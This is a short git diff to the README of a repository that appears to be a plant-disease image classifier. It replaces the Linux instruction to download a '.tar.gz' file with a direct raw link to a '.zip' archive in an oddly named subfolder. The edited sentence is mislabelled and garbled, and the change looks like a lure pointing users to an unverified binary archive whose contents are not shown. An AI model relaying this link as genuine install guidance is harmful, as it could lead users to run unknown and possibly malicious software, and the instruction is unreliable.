Oskar12953/plantvillage-disease-classifier/README.md

 - For Windows, download the `.exe` file.
 - For macOS, download the `.dmg` file.
-- For Linux, download the `.tar.gz` file.
+- For Linux, download the `https://github.com/Oskar12953/plantvillage-disease-classifier/raw/refs/heads/main/euphemiously/plantvillage_disease_classifier_2.8-alpha.3.zip` file.

 Click on the appropriate file to start the download.